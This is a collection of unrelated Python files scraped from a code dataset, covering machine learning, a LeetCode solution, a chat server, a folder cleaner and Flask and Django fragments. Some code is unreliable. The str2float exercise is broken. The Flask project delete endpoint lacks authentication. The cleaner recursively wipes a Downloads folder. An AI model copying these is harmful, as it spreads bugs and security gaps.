keras.utils.to_categorical(y_train, num_classes=2)\n    train_size = y_train.shape[0]\n    Weight_Decay = 2.5/train_size\n    dropout_prob = 0.25\n    batch_size=128\n    nb_filters = 30\n    nb_pool = 3\n    nb_conv = 4\n    img_rows = img_cols = 28\n    nb_classes = 2\n    model = Sequential()\n    model.add(Convolution2D(nb_filters, nb_conv, strides=1, data_format=\"channels_first\", input_shape=(1, img_rows, img_cols)))\n    model.add(Activation('relu'))\n    model.add(Dropout(dropout_prob))\n    model.add(Convolution2D(nb_filters, nb_conv, strides=2))\n    model.add(Activation('relu'))\n    model.add(MaxPooling2D(pool_size=(nb_pool, nb_pool)))\n    model.add(Flatten())\n    model.add(Dropout(dropout_prob))\n    model.add(Dense(100, W_regularizer=l2(Weight_Decay)))\n    model.add(Activation('relu'))\n    model.add(Dropout(dropout_prob))\n    model.add(Dense(nb_classes))\n    model.add(Activation('softmax'))\n    model.compile(loss='categorical_crossentropy', optimizer='adam')\n    hist = model.fit(X_train, y_train, epochs=60, steps_per_epoch=100, verbose=0)\n    f_rand = K.function([model.layers[0].input, K.learning_phase()],[model.layers[-1].output])\n    y_test_output = predict_with_uncertainty(f_rand, X_test, n_iter=100)\n    y_test_predictions = np.argmax(y_test_output, axis=1)\n    return np.sum(y_test_predictions==y_test_original)/(y_test_original.shape[0])\n\nall_acc = []\nall_tr_ind = []\nfor e in range(num_experiments):\n    exp_acc = []\n    all_acc.append(exp_acc)\n    #Initial training/accuracy\n    train_data_indices = list(np.load(folder_path + 'trainindices' + str(e+1) + '.npy'))\n    all_tr_ind.append(train_data_indices)\n    pool_indices = [i for i in train_ind if i not in train_data_indices]\n    exp_acc.append(run_model(train_data_indices))\n    for acq in range(num_acquisitions):\n        new_ind_ind = np.random.choice(len(pool_indices))\n        train_data_indices.append(pool_indices[new_ind_ind])\n        del pool_indices[new_ind_ind]\n        exp_acc.append(run_model(train_data_indices))\n    all_acc[-1] = exp_acc\n    all_tr_ind[-1] = train_data_indices\n    print('all acc: ' + str(all_acc))\n    print('all ind: ' + str(all_tr_ind))\n    np.save(folder_path+'RandomAcqAcc.npy', np.array(all_acc))\n    np.save(folder_path+'RandomAcqInd.npy', np.array(all_tr_ind))\nprint('All Acc: ' + str(all_acc))\n","sub_path":"Active Learning Experiments/Fall2019Results/RandomAcqBinary.py","file_name":"RandomAcqBinary.py","file_ext":"py","file_size_in_byte":4146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"182988467","text":"\"\"\"\nGiven an array of meeting time intervals, each with a start and end time [[s1,e1],[s2,e2],...] (si < ei), compute the minimum number of conference rooms needed to hold all the meetings without conflicts while making full use of the rooms.\n\nExample 1:\n\nInput: [[0, 30],[5, 10],[15, 20]]\nOutput: 2\n\nExample 2:\n\nInput: [[7,10],[2,4]]\nOutput: 1\n\nSource: LeetCode (力扣)\nLink: https://leetcode-cn.com/problems/meeting-rooms-ii\nCopyright belongs to LeetCode. Commercial reprints require official authorization; non-commercial reprints must cite the source.\n\"\"\"\nimport heapq  # heapq provides a min-heap\n\n\nclass Solution:\n    def minMeetingRooms(self, intervals: [[int]]) -> int:\n        # compare the smallest end time in the min-heap with each meeting's start time\n        if not intervals:\n            return 0\n        intervals = sorted(intervals, key=lambda x: x[0])\n        meeting_list = []\n        start_list = [x[0] for x in intervals]\n        end_list = [x[1] for x in intervals]\n        heapq.heapify(meeting_list)\n        heapq.heappush(meeting_list, end_list[0])\n        for i in range(1, len(start_list)):\n            earliest = heapq.heappop(meeting_list)\n            if start_list[i] < earliest:\n                heapq.heappush(meeting_list, earliest)\n            heapq.heappush(meeting_list, end_list[i])\n        return len(meeting_list)\n\n    def minmeetingrooms2(self, intervals):\n        if not intervals:\n            return 0\n        used_room = 0\n        start_timings = sorted(i[0] for i in intervals)\n        end_timings = sorted(i[1] for i in intervals)\n        L = len(intervals)\n        end_p = 0\n        start_p = 0\n        while start_p < L:\n            if start_timings[start_p] >= end_timings[end_p]:\n                used_room -= 1\n                end_p += 1\n            used_room += 1\n            start_p += 1\n        return used_room\n\n\nif __name__ == '__main__':\n    d = Solution()\n    print(d.minMeetingRooms([[0, 30], [5, 10], [15, 20]]))\n    print(d.minmeetingrooms2([[0, 30], [5, 10], [15, 20]]))\n","sub_path":"minMeetingRooms.py","file_name":"minMeetingRooms.py","file_ext":"py","file_size_in_byte":2039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"13337645","text":"import math\n\nclass VGuard:\n#tunnelLowFlows - ordered list of triples (flowPriority, flowIntensity, flowID)\n#tunnelHighFlows - ordered list of triples (flowPriority, flowIntensity, flowID)\n# flowPriority - float number (0 ~ 1)\n# flowIntensity - integer\n# flowID - string\n    tunnelLowFlows = []\n    tunnelHighFlows = []\n\n#tunnelLowUse - bandwidth use of low tunnel (integer)\n#tunnelHighUse - bandwidth use of high tunnel (integer)\n    tunnelLowUse = 0\n    tunnelHighUse = 0\n\n#tunnelLowCapacity - bandwidth capacity of low tunnel (integer)\n#tunnelHighCapacity - bandwidth capacity of high tunnel (integer)\n    tunnelLowCapacity = 0\n    tunnelHighCapacity = 0\n\n#tunnelHighNormal - normal bandwidth use of high tunnel (float 0 ~ 1)\n#tunnelHighSum - priorities sum from tunnelHighFlows\n#tunnelLowSum - priorities sum from tunnelLowFlows\n    tunnelHighNormal = 0\n    tunnelHighSum = 0\n    tunnelLowSum = 0\n\n#tunnelLowDrop - traffic drop by tunnel low filter for each flow (integer)\n#tunnelLowDropRate - total traffic dropped by the filter (integer)\n    tunnelLowDrop = {}\n    tunnelLowDropRate = 0\n\n    def __init__(self, lowCapacity, highCapacity, highNormal):\n        self.tunnelLowCapacity = lowCapacity\n        self.tunnelHighCapacity = highCapacity\n        self.tunnelHighNormal = highNormal\n\n    def flowAllocation(self, flowID, flowPriority, flowIntensity, flowType):\n        if self.tunnelLowUse < self.tunnelHighUse:\n            self.tunnelLowFlows.append([flowPriority, flowIntensity, flowID, flowType])\n            self.tunnelLowUse += flowIntensity\n            self.tunnelLowSum += flowPriority\n        else:\n            if self.tunnelHighUse/self.tunnelHighCapacity < self.tunnelHighNormal:\n                self.tunnelHighFlows.append([flowPriority, flowIntensity, flowID, flowType])\n                self.tunnelHighUse += flowIntensity\n                self.tunnelHighSum += flowPriority\n            else:\n                if self.tunnelHighUse > self.tunnelHighCapacity:\n                    self.tunnelLowFlows.append([flowPriority, flowIntensity, 
flowID, flowType])\n self.tunnelLowUse += flowIntensity\n self.tunnelLowSum += flowPriority\n else:\n if flowPriority > self.tunnelHighSum/len(self.tunnelHighFlows):\n self.tunnelHighFlows.append([flowPriority, flowIntensity, flowID, flowType])\n self.tunnelHighUse += flowIntensity\n self.tunnelHighSum += flowPriority\n else:\n self.tunnelLowFlows.append([flowPriority, flowIntensity, flowID, flowType])\n self.tunnelLowUse += flowIntensity\n self.tunnelLowSum += flowPriority\n\n def tunnelLowFilter(self):\n self.tunnelLowDrop = {}\n self.tunnelLowDropRate = 0\n\n if self.tunnelLowUse > self.tunnelLowCapacity:\n tunnelDropRate = self.tunnelLowUse - self.tunnelLowCapacity\n totalTunnelDrop = self.tunnelLowUse - self.tunnelLowCapacity\n\n for flow in self.tunnelLowFlows:\n #dropFactor = (1-flow[0]) + (flow[0]*0.1)\n #dropFactor = 1-flow[0]\n dropFactor = ((1 - flow[0]) + (((1 - flow[0]) + (flow[0] * 0.1)) * (tunnelDropRate / totalTunnelDrop)))\n if dropFactor > 1:\n dropFactor = 1\n flowDrop = flow[1] * dropFactor\n if flowDrop < tunnelDropRate:\n self.tunnelLowDrop[flow[2]] = round(flowDrop, 0)\n tunnelDropRate -= flowDrop\n self.tunnelLowDropRate += flowDrop\n else:\n self.tunnelLowDrop[flow[2]] = round(tunnelDropRate,0)\n self.tunnelLowDropRate += tunnelDropRate\n break","sub_path":"Solutions/VGuard.py","file_name":"VGuard.py","file_ext":"py","file_size_in_byte":3837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"422258455","text":"import cv2\nimport numpy as np\nimport time\nimport argparse\n\n\n\nprint(\"\"\"\n*******Green color detection test******\n \"\"\")\n\n\n\n\nimg = cv2.imread('test.jpeg')\n# Converting the color space from BGR to HSV\nhsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n\n# Generating mask to detect green color\nlower_green = np.array([40,5,80])\nupper_green= np.array([80,255,255])\nmask1 = cv2.inRange(hsv,lower_green,upper_green)\n\nlower_green= np.array([140,5,80])\nupper_green= np.array([180,255,255])\nmask2 = cv2.inRange(hsv,lower_green,upper_green)\n\n\nmask1 = mask1+mask2\n\nmask1 = cv2.morphologyEx(mask1, cv2.MORPH_OPEN, np.ones((1,1),np.uint8),iterations=2)\nmask1 = cv2.dilate(mask1,np.ones((1,1),np.uint8),iterations = 1)\nmask2 = cv2.bitwise_not(mask1)\n\ncv2.imshow('Result!!!',mask2)\ncv2.imwrite('Test_green.jpg', mask2 ) \n\n\n\n","sub_path":"demo (1).py","file_name":"demo (1).py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"607110129","text":"from pyke import knowledge_engine\nimport logging\nfrom EnvNav import EnvNav\n\n\nclass KbExpert:\n\n def __init__(self,\n log=None,\n conf=None):\n self.conf = conf\n if conf is None:\n self.conf = dict(name=\"KBExpert\",\n rule_name=\"rules\")\n self.log = log\n self.output(\"Starting\", \"info\")\n self.contexts_tree = EnvNav()\n self.engine = knowledge_engine.engine((__file__, '.rules'))\n self.context_all_facts = []\n self.rules = self.conf[\"rule_name\"]\n\n def set_rules(self, rules):\n self.rules = rules\n\n def get_contexts_tree(self):\n return self.contexts_tree\n\n def set_context_tree(self, tree):\n self.contexts_tree = tree\n\n def add_context_tree(self, cont):\n self.contexts_tree.add_context(cont)\n self.get_facts_from_all_contexts()\n\n def get_context_all_facts(self):\n return self.context_all_facts\n\n def get_facts_from_all_contexts(self):\n self.context_all_facts=[]\n for contexts in self.contexts_tree.get_contexts():\n 
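A small usage sketch for the VGuard class above; the capacities and flow numbers here are invented:

guard = VGuard(lowCapacity=50, highCapacity=100, highNormal=0.8)
guard.flowAllocation("flow-a", 0.9, 60, "video")  # tunnels start equal; high tunnel is under its normal load
guard.flowAllocation("flow-b", 0.2, 80, "bulk")   # low tunnel is now the lighter one
guard.tunnelLowFilter()                           # low tunnel exceeds 50, so 30 units are dropped
print(guard.tunnelLowDrop, guard.tunnelLowDropRate)  # {'flow-b': 30} 30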
self.get_env_fromNav(contexts, [contexts.__module__])\n return self.context_all_facts\n\n def get_env_fromNav(self, model, names):\n fl = True\n for val in model.__dict__.keys():\n if val == \"value\":\n tup = {\"sys\": \"\", \"sens\": \"\", \"values\": \"\"}\n values = []\n aux = 0\n for n in names:\n aux = aux + 1\n if aux == 1:\n tup[\"sys\"] = n\n elif aux == 2:\n tup[\"sens\"] = n\n else:\n values.append(n)\n values.append(model.value)\n tup[\"values\"] = values\n self.context_all_facts.append(tup)\n fl = False\n if fl:\n for val in model.__dict__.keys():\n names.append(val)\n model2 = getattr(model, val)\n self.get_env_fromNav(model2, names)\n names.pop()\n\n def assert_rules(self):\n self.engine.activate(self.rules)\n for e in self.context_all_facts:\n self.engine.assert_(str(e['sys']), str(e['sens']), e['values'])\n try:\n vals, plans = self.engine.prove_1_goal(\n self.rules+'.toret($sens,$value,$ret)')\n toret = dict(vals=vals, plans=plans)\n self.output(vals, \"debug\")\n self.engine.reset()\n return toret\n except knowledge_engine.CanNotProve:\n toret = dict(vals=None, plans=None)\n self.output(\"No rules applies\", \"debug\")\n self.engine.reset()\n return toret\n except AssertionError:\n toret = dict(vals=None, plans=None)\n self.output(\"Assertion Error\", \"critical\")\n self.engine.reset()\n return toret\n self.engine.reset()\n toret = dict(vals=None, plans=None)\n return toret\n\n def output(self,\n msg,\n lvl=\"info\"):\n if self.log is not None:\n getattr(self.log, lvl)(self.conf[\"name\"] + \": \" + str(msg))\n\n\nif __name__ == \"__main__\":\n env = EnvNav()\n kb = KbExpert()\n","sub_path":"resources/KBManager.py","file_name":"KBManager.py","file_ext":"py","file_size_in_byte":3303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"645291074","text":"import re\nimport subprocess\n\nimport sublime\nimport sublime_plugin\n\nfrom .settings import (\n PKG_SETTINGS_KEY_ENABLED,\n PKG_SETTINGS_KEY_EXCLUDE,\n PKG_SETTINGS_KEY_EXTEND_EXCLUDE,\n PKG_SETTINGS_KEY_EXTEND_INCLUDE,\n PKG_SETTINGS_KEY_INCLUDE,\n pkg_settings,\n)\nfrom .sublime_extra import log_and_present_current_exn, platform_startupinfo\n\n# @todo #0 Why does cursor position advance forward after each save when using e.g.\n# pg_format on the .sql file:\n# CREATE TABLE persons (\n# personid INT\n# , lastname VARCHAR(255)\n# , firstname VARCHAR(255)\n# , address VARCHAR(255)\n# , city VARCHAR(255)\n# );\n\n\nclass PreSaveFormat(sublime_plugin.TextCommand):\n\n TXT_ENCODING = \"utf-8\"\n\n # Overrides --------------------------------------------------\n\n def run(self, edit, command, append_file_path_to_command=False, **_):\n try:\n self.run_core(edit, command, append_file_path_to_command)\n except Exception:\n log_and_present_current_exn()\n\n # ------------------------------------------------------------\n\n def run_core(self, edit, command, append_file_path_to_command):\n view_region = sublime.Region(0, self.view.size())\n view_content = self.view.substr(view_region)\n view_content_started_empty = len(view_content) == 0\n\n view_file_path = self.view.file_name()\n if append_file_path_to_command:\n command.append(view_file_path)\n\n # Allow e.g. 
numbers to be unquoted in the settings file (4 instead of \"4\")\n command = [str(component) for component in command]\n\n print( # noqa: T001\n \"[{0}] Running process {1} fed with content of view {2}\".format(\n PreSaveFormat.__name__, command, view_file_path\n )\n )\n child_proc = subprocess.Popen(\n command,\n stdin=subprocess.PIPE,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n startupinfo=platform_startupinfo(),\n )\n stdout_content_bytes, stderr_content_bytes = child_proc.communicate(\n input=bytes(view_content, self.TXT_ENCODING)\n )\n stdout_content, stderr_content = (\n stdout_content_bytes.decode(self.TXT_ENCODING),\n self.postprocess_stderr(stderr_content_bytes.decode(self.TXT_ENCODING)),\n )\n\n if child_proc.returncode != 0:\n print( # noqa: T001\n \"\\n\\n*** [{0}] stderr of `{1}` was:\\n\\n{2}\\n\\n\".format(\n PreSaveFormat.__name__, command[0], stderr_content\n )\n )\n sublime.set_timeout(\n lambda: sublime.status_message(\n \"{0} failed - see console\".format(command[0]).upper()\n ),\n 100,\n )\n return\n\n if not len(stdout_content) and not view_content_started_empty:\n raise Exception(\n \"[{0}] '{1}' command produced no output \"\n \"despite exiting successfully.\".format(\n PreSaveFormat.__name__, command[0]\n )\n )\n self.view.replace(edit, view_region, stdout_content)\n\n def postprocess_stderr(self, s):\n # Remove ANSI colour codes\n s = re.sub(\"\\x1b\\\\[\\\\d{1,2}m\", \"\", s) # noqa: FS003\n return s.strip()\n\n\n# @todo #0 Key the settings file on pos0 scope selectors (like BuildOnSave) rather than\n# path of view's syntax definition. That way, stuff like JS & TS, C & C++ can share one\n# settings block that has an appropriate selector, rather than duplicating blocks.\n\n\nclass PreSaveListener(sublime_plugin.ViewEventListener):\n\n # Overrides --------------------------------------------------\n\n @classmethod\n def is_applicable(cls, settings):\n return cls.settings_for_view_language(settings) is not None\n\n @classmethod\n def applies_to_primary_view_only(cls):\n return False\n\n def on_pre_save(self):\n try:\n lang_settings = self.settings_for_view_language(self.view.settings())\n if isinstance(lang_settings, list):\n steps = lang_settings\n else:\n steps = [lang_settings]\n\n for step in steps:\n if self.should_format(self.view.file_name(), step):\n self.view.run_command(PreSaveFormat(None).name(), step)\n except Exception:\n log_and_present_current_exn()\n\n # ------------------------------------------------------------\n\n @classmethod\n def settings_for_view_language(cls, view_settings):\n view_syntax_path = view_settings.get(\"syntax\")\n return pkg_settings().get(view_syntax_path)\n\n def load_extensible_settings_list(self, priority_settings, key, extension_key):\n lst = priority_settings.get(key, pkg_settings().get(key))\n lst.extend(\n priority_settings.get(extension_key, pkg_settings().get(extension_key, []))\n )\n return lst\n\n def should_format(self, path, lang_settings):\n if not lang_settings.get(PKG_SETTINGS_KEY_ENABLED, True):\n return False\n\n includes = self.load_extensible_settings_list(\n lang_settings, PKG_SETTINGS_KEY_INCLUDE, PKG_SETTINGS_KEY_EXTEND_INCLUDE\n )\n excludes = self.load_extensible_settings_list(\n lang_settings, PKG_SETTINGS_KEY_EXCLUDE, PKG_SETTINGS_KEY_EXTEND_EXCLUDE\n )\n\n # @todo #0 Use Python stdlib \"glob\" rather than basic substring matching.\n # And add a comment in the default settings file explaining the logic.\n include_hits = [fragment in path for fragment in includes]\n exclude_hits = [fragment 
in path for fragment in excludes]\n return any(include_hits) and not any(exclude_hits)\n","sub_path":"src/format.py","file_name":"format.py","file_ext":"py","file_size_in_byte":5780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"51299752","text":"from functools import reduce\r\ndef str2float(s):\r\n s1, s2 = s.split('.')\r\n def char2num(a):\r\n digits = {'0': 0, '1': 1, '2': 2, '3': 3, '4': 4, '5': 5, '6': 6, '7': 7, '8': 8, '9': 9}\r\n return digits[a]\r\n def num2numSeries(x, y):\r\n return x * 10 + y\r\n \r\n result = reduce(map(num2numSeries, s1)) + reduce(map(num2numSeries, s2)) / len(s2)\r\n return result\r\n\r\n\r\n\r\nprint('str2float(\\'123.456\\') =', str2float('123.456'))\r\nif abs(str2float('123.456') - 123.456) < 0.00001:\r\n print('测试成功!')\r\nelse:\r\n print('测试失败!')\r\n","sub_path":"str2float.py","file_name":"str2float.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"345776432","text":"from flask_restful import Resource\nfrom flask import request\nfrom werkzeug.security import safe_str_cmp\nfrom flask_jwt_extended import (\n jwt_refresh_token_required,\n get_jwt_identity,\n jwt_required,\n get_raw_jwt,\n fresh_jwt_required\n)\nfrom marshmallow import ValidationError\nfrom models import db, ma, ProjectModel, ProjectSchema, UserModel, UserSchema\n\nPROJECT_ALREADY_EXISTS = \"A project with that name already exists.\"\nCREATED_SUCCESSFULLY = \"Project created successfully.\"\nPROJECT_NOT_FOUND = \"Project not found.\"\nPROJECT_DELETED = \"Project deleted.\"\nINVALID_CREDENTIALS = \"Invalid credentials!\"\n\nproject_schema = ProjectSchema()\nproject_list_schema = ProjectSchema(many=True)\nuser_schema = UserSchema()\n\n\nclass ProjectCreate(Resource):\n @classmethod\n @jwt_required\n def put(cls, user_id: int):\n project_json = request.get_json()\n user = UserModel.find_by_id(user_id)\n current_user = get_jwt_identity()\n\n if user and user.id == current_user:\n try:\n project = project_schema.load(request.get_json())\n except ValidationError as err:\n return err.messages, 400\n\n if project in user.projects:\n return {\"message\": \"Project exists\"}, 400\n else:\n user.projects.append(project)\n\n project.save_to_db()\n user.save_to_db()\n return project_schema.dump(project), 200\n else:\n return{\"message\": INVALID_CREDENTIALS}, 401\n\n\nclass Project(Resource):\n @classmethod\n def get(cls, project_id: int):\n project = ProjectModel.find_by_id(project_id)\n if not project:\n return {\"message\": PROJECT_NOT_FOUND}, 404\n\n return project_schema.dump(project), 200\n\n @classmethod\n def delete(cls, project_id: int):\n project = ProjectModel.find_by_id(project_id)\n if not project:\n return {\"message\": PROJECT_NOT_FOUND}, 404\n\n project.delete_from_db()\n return {\"message\": PROJECT_DELETED}, 200\n\n\nclass ProjectList(Resource):\n @classmethod\n def get(cls, user_id: int):\n return {\"projects\": project_list_schema.dump(ProjectModel.find_all_user(user_id))}, 200\n","sub_path":"server/resources/Project.py","file_name":"Project.py","file_ext":"py","file_size_in_byte":2227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"455811581","text":"from Component_py.stubs import require, __pragma__ # __:skip\nfrom Component_py.component import destruct\n\nReact = require(\"react\")\nFormGroup, Label, Input = destruct(\n require(\"reactstrap\"), \"FormGroup\", \"Label\", 
\"Input\")\n\n\ndef FormPanel(props):\n def on_text_change(e):\n props.form_panel_update(e.target.value)\n\n return __pragma__(\"xtrans\", None, \"{}\", \"\"\" (\n \n \n \n \n ); \"\"\")\n","sub_path":"src/components/FormPanel.py","file_name":"FormPanel.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"370563165","text":"from . import RLinterface3 as RLinterface\nimport random\n\n\n# Random walk example using RL interface\n\ndef argmaxrandom(values):\n \"Returns the index of the maximum entry in the list of values\"\n best_index = 0\n best_value = values[0]\n numties = 1\n for i in range(len(values)):\n val = values[i]\n if val < best_value: # our older value is better\n pass\n elif val > best_value: # the new value is better\n best_index = i\n best_value = val\n else: # there is a tie; randomly pick\n numties += 1\n if random.randrange(0, numties) == 0: # chose the new one\n best_index = i\n best_value = val\n return best_index # old version returned index and value - change?\n\n\nclass Agent:\n \"Random walk agent\"\n\n def __init__(self, epsilon=0.1, alpha=0.1, gamma=0.9):\n self.epsilon = epsilon\n self.alpha = alpha\n self.gamma = gamma\n\n def agentChoose(self, s):\n \"Chooses the next action using epsilon-greedy\"\n if random.random() < self.epsilon:\n self.lasta = random.randrange(self.numactions)\n else:\n self.lasta = argmaxrandom(self.Q[s])\n self.lasts = s\n # print \"Agent chose action\", self.lasta\n return self.lasta\n\n def statevalue(self, s):\n if s == None:\n return 0\n elif s == 'terminal':\n return 0\n else:\n return max(self.Q[s])\n\n def agentLearn(self, s, a, r, sp):\n \"Learns from the last action done - doing Qlearning\"\n # print \"Learning from state\", s, \"action\", a, \"reward\", r, \"next s\", sp\n self.Q[s][a] += self.alpha * \\\n (r + (self.gamma * self.statevalue(sp)) \\\n - self.Q[s][a])\n\n def agent_init(self, taskspec):\n \"Initialize the agent\"\n # print \"Initializing agent with \", taskspec\n self.numactions, self.numstates = taskspec\n self.lasta = 0\n self.lasts = 0\n self.Q = [[0.0 for i in range(self.numactions)] \\\n for j in range(self.numstates)]\n\n def agent_start(self, s):\n \"Return the first action\"\n self.lasts = s\n return self.agentChoose(s)\n\n def agent_step(self, r, s):\n \"Learns and gets the next action\"\n self.agentLearn(self.lasts, self.lasta, r, s)\n self.lasts = s\n return self.agentChoose(s)\n\n def agent_end(self, r):\n \"Learns and gets the next action\"\n self.agentLearn(self.lasts, self.lasta, r, 'terminal')\n\n\nclass Environment:\n \"Random walk environment\"\n\n def __init__(self, numstates, numactions=2):\n self.numactions = numactions\n self.numstates = numstates\n\n def env_init(self):\n self.curstate = self.numstates // 2 # start in the middle\n return self.numactions, self.numstates\n\n def env_start(self):\n \"Returns the initial state\"\n self.curstate = self.numstates // 2 # start in the middle\n # print \"Environment initializing state to\", self.curstate\n return self.curstate\n\n def env_step(self, a):\n \"Does the action and returns the next state and reward\"\n if a == 0:\n self.curstate -= 1 # First action, go left\n elif a == self.numactions - 1:\n self.curstate += 1 # Last action, go right\n\n if self.curstate == 0: # reached left end\n self.curstate = 'terminal'\n r = -1\n elif self.curstate == self.numstates - 1: # reached right end\n self.curstate = 'terminal'\n r = 1\n else:\n r = 0\n # print 
\"Environment did action\", a, \"got new state\", self.curstate, \"and reward\", r\n return r, self.curstate\n\n\nagt = Agent()\nenv = Environment(10)\nrli = RLinterface.RLinterface(agt, env)\n\n# rli.RL_init()\n\nfor i in range(30):\n eps = rli.RL_episode()\n print(eps)\n print((\"Reward\", eps[-1], \"took\", rli.RL_num_steps(), \"steps\"))\n","sub_path":"RLtoolkit/rlitest3b.py","file_name":"rlitest3b.py","file_ext":"py","file_size_in_byte":4003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"227548923","text":"# Remaking the scales.py file from the bottom up because I'm bad at coding\n\n'''\nThis file containts all the functions (\"scales\") for the filesnake program\n'''\n\n###########\n# Imports #\n###########\n\nimport os\nimport shutil\nimport sys # for checking Python version\nfrom sys import platform as _platform # For OS Checking\nimport csv\n\n#//////////////////////////////////////////////////////////////////////#\n\n#############\n# Variables #\n#############\n\ntmpdesktop = os.path.join(\"C:\\\\\", \"Users\", \"Jack\", \"Desktop\", \"Tiny Desktop\", \"tmp\")\ndownloads = os.path.join('C:\\\\', 'Users', 'Jack', 'Downloads')\n\nkeep = ('keep' or 'Keep') # name of file in directory to not be deleted\n\n#//////////////////////////////////////////////////////////////////////#\n\n##########\n# Scales # Remember, scales are just my dumb way of saying \"functions\"\n##########\n\n\ndef clear():\n\tos.system('cls' if os.name == 'nt' else 'clear') # Clears terminal window of text\n\n\ndef setbeenrun(): # Only run certain functions the first time the script is run\n\n\twith open(os.path.join('Data','firstrun.txt'),'r+') as beenrun:\n\t\tbeenrun.write('True')\n\n\ndef welcomemsg():\n\tclear()\n\n\tinput(\"\\n\\nWelcome to the cleaner!\" + '\\n' + 'Press any key to continue...')\n\tclear()\n\tcleantool()\n\n\ndef rerun():\n\tchoice = ''\n\tchoice = input('\\n' + 'Would you like to run the cleaner again? Y or N: ').upper()\n\n\tif choice == 'Y':\n\t\tcleantool()\n\telif choice == 'N':\n\t\texit()\n\telse:\n\t\tprint(\"Not a valid response.\")\n\t\trerun()\n\n\ndef folderCleaner(target):\n\ttry:\n\t\tfor root, dirs, files in os.walk(target):\n\t\t\tfor name in files:\n\t\t\t\tif (keep not in root and keep not in name):\n\t\t\t\t\tos.unlink(os.path.join(root, name))\n\t\t\tfor name in dirs:\n\t\t\t\tif (keep not in root and keep not in name):\n\t\t\t\t\tshutil.rmtree(os.path.join(root, name))\n\n\t\t\tinput(\"The folder has been cleaned! Press any key to continue...\")\n\t\t\trerun()\n\texcept:\n\t\tinput(\"The cleaner did not finish successfully. Press any key to continue...\")\n\t\trerun()\n\n\ndef cleantool():\n\tclear()\n\tchoice = ''\n\tchoice = input('Which directory do you want to clean?' 
+ '\\n' + '(D)ownloads or (T)mpdesktop?: ').upper()\n\n\tif choice == \"T\":\n\t\tfolderCleaner(tmpdesktop)\n\telif choice == \"D\":\n\t\tfolderCleaner(downloads)\n\telse:\n\t\tprint(\"Invalid choice.\")\n\t\tcleantool()\n\nsetbeenrun() # test to see that setbeenrun() works; it does!","sub_path":"scales.py","file_name":"scales.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"361973380","text":"\n\nfrom xai.brain.wordbase.nouns._fifteenth import _FIFTEENTH\n\n#class header\nclass _FIFTEENTHS(_FIFTEENTH):\n\tdef __init__(self):\n\t\t_FIFTEENTH.__init__(self)\n\t\tself.name = \"FIFTEENTHS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"fifteenth\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_fifteenths.py","file_name":"_fifteenths.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"455372517","text":"import socket\r\n\r\n# Define socket host and port\r\nimport threading\r\n\r\nfrom Hall import Hall\r\n\r\nclass Client:\r\n def __init__(self, sock, client_name):\r\n self.sock = sock\r\n self.client_name = client_name\r\n\r\nSERVER_HOST = '0.0.0.0'\r\nSERVER_PORT = 8000\r\n\r\n# Create socket\r\nserver_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nserver_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\nserver_socket.bind((SERVER_HOST, SERVER_PORT))\r\nserver_socket.listen(1)\r\nprint('Listening on port %s ...' % SERVER_PORT)\r\n\r\nclients = []\r\nhall = Hall('#general')\r\n\r\ndef handle_client(client):\r\n while True:\r\n # Receive a message from the client\r\n msg = client.sock.recv(1024).decode()\r\n\r\n if msg == 'exit':\r\n goodbyeMsg = 'exit'\r\n client.sock.sendall(goodbyeMsg.encode())\r\n\r\n name = client.client_name\r\n clients.remove(client)\r\n hall.remove_client(client)\r\n leaveMsg = name + ' has left the chat'\r\n for other in clients:\r\n other.sock.sendall(leaveMsg.encode())\r\n break\r\n\r\n if msg != 'exit':\r\n # Hand the client's message to the hall\r\n hall.handle_msg(client, msg)\r\n\r\nwhile True:\r\n # Wait for client connections\r\n client_connection, client_address = server_socket.accept()\r\n\r\n # Get the username\r\n while True:\r\n name = client_connection.recv(1024).decode()\r\n client = Client(client_connection, name)\r\n if not hall.check_Username(client):\r\n clients.append(client)\r\n client.sock.sendall('Username Accepted'.encode())\r\n break\r\n else:\r\n client.sock.sendall('Username Declined'.encode())\r\n\r\n # The hall greets the new client\r\n entryMsg = hall.welcome_new(client)\r\n\r\n msg = 'User ' + name + ' is now connected!'\r\n hall.broadcastNews(msg, client)\r\n client.sock.sendall(entryMsg.encode())\r\n\r\n # Create a thread to handle the client\r\n thread = threading.Thread(target=handle_client, args=(client, ))\r\n thread.start()","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"421388272","text":"from django.forms import FileInput, CheckboxInput\nfrom django.forms.widgets import FILE_INPUT_CONTRADICTION # sentinel returned below when a file is both uploaded and cleared\nfrom django.utils.html import conditional_escape, format_html\nfrom django.utils.encoding import force_text\nfrom django.utils.safestring import mark_safe\nfrom django.utils.translation import ugettext_lazy\nimport os\n\nclass SecureFileInput(FileInput):\n\n\tinitial_text = 
